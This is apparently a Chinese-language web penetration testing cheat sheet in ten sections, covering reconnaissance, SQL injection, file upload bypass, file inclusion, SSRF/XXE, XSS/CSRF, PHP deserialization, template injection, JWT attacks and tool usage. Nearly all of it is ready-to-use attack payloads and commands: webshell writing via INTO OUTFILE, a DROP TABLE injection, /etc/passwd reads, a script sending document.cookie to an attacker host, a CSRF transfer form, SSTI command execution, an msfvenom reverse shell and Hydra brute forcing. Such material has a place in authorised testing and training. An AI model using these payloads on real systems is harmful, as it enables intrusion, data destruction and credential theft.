一、信息收集与侦察

# 子域名枚举
subfinder -d target.com -o subdomains.txt
amass enum -d target.com
# 证书透明度
curl -s "https://crt.sh/?q=%.target.com&output=json" | jq -r '.[].name_value' | sort -u
# DNS爆破
dnsrecon -d target.com -D /usr/share/wordlists/dns.txt -t brt

# 目录爆破
dirb http://target.com /usr/share/wordlists/dirb/common.txt -r -X .php,.txt
gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -t 50 -x php,html,txt
# 特殊文件:/.git/HEAD /.svn/entries /.DS_Store /robots.txt
# 端口扫描
nmap -sS -sV -sC -O -p- -T4 target.com
# UDP扫描
nmap -sU -p 53,123,161,500 -T4 target.com
# 绕过防火墙
nmap -f --mtu 8 -D RND:10 target.com

二、SQL注入

# 联合查询
' UNION SELECT 1,2,3--+
' UNION SELECT 1,database(),version()--+

# 报错注入(MySQL)
' AND extractvalue(1,concat(0x7e,(SELECT database())))
' AND updatexml(1,concat(0x7e,(SELECT user())),1)

# 布尔盲注
' AND SUBSTRING((SELECT database()),1,1)='t'--+

# 时间盲注
' AND IF((SELECT LENGTH(database()))>3,SLEEP(2),0)--+

# 堆叠注入
'; DROP TABLE users--+
'; SELECT '<?php phpinfo();?>' INTO OUTFILE '/var/www/html/shell.php'--+

# 常用函数
database(), user(), version(), @@datadir, load_file('/etc/passwd')

三、文件上传绕过

# 后缀绕过
.asp .php .php3 .php4 .php5 .phtml .pht .shtml .asa .cer .jsp .jspx

# 双重扩展名
shell.php.jpg shell.php;.jpg shell.php%00.jpg

# MIME伪造
Content-Type: image/jpeg Content-Type: image/gif

# 文件头伪造
GIF89a <?php ... ?>
# 图片马-合并
copy normal.jpg /b + shell.php /a shell.jpg

# .htaccess上传
AddType application/x-httpd-php .jpg
# .user.ini (PHP 5.3+)
auto_prepend_file = shell.jpg

# 条件竞争
while true; do echo '<?php [CODE_REMOVED] ?>' > /var/www/html/shell.php; done

四、文件包含与RCE

# LFI读取文件
../../../etc/passwd
../../../proc/self/environ
# PHP伪协议
php://filter/convert.base64-encode/resource=index.php
# 日志注入
User-Agent: <?php system($_GET['cmd']); ?>
# 写入Session
php://filter/write=convert.base64-decode/resource=shell.php

# RCE危险函数
# PHP: system(), exec(), shell_exec(), passthru(), `cmd`, popen(), proc_open()
# Python: eval(), exec(), os.system(), subprocess.call()
# Node: eval(), exec(), vm.runInNewContext()

五、SSRF与XXE

# SSRF利用
curl http://127.0.0.1:8080/admin
file:///etc/passwd  dict://127.0.0.1:6379/info
# XXE读取文件
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>
# XXE SSRF
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://internal:8080/">]>

六、XSS与CSRF

# 反射型
<script>alert(1)</script>
<img src=x onerror=alert(1)>
# 存储型
<script>new Image().src="http://attacker/steal?c="+document.cookie</script>
# DOM型
#eval(location.hash.slice(1))

# CSRF PoC
<form action="http://bank/transfer" method=POST>
<input type=hidden name=to value=attacker>
<input type=hidden name=amount value=10000>
</form><script>document.forms[0].submit()</script>

七、PHP反序列化

# 基本POP链构造
class Example { public $cmd = "id"; function __destruct() { system($this->cmd); } }
echo serialize(new Example);
# O:7:"Example":1:{s:3:"cmd";s:2:"id";}

# Phar反序列化
$phar = new Phar("test.phar");
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Example());
# 触发:phar://test.phar

八、SSTI模板注入

# Jinja2 (Flask)
{{7*7}} {{config}} {{request}}
{{get_flashed_messages.__globals__['__builtins__']['__import__']('os').popen('id').read()}}

# Twig (PHP)
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

# Smarty (PHP)
{php}phpinfo(){/php}
{$smarty.const._Smarty_}{Smarty_Internal_Write_File::_phpcode()}

九、JWT攻击

# alg=none
{"alg":"none","typ":"JWT"} + 空签名
# 弱密钥爆破
python jwt_tool.py target_jwt -C -d /usr/share/wordlists/rockyou.txt
# kid注入
{"kid":"../../../etc/passwd","alg":"HS256","typ":"JWT"}

十、工具速查

# Searchsploit
searchsploit apache 2.4.49
searchsploit -m exploits/multi/http/xxx.py
# Msfvenom
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf -o shell.elf
# Hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com ssh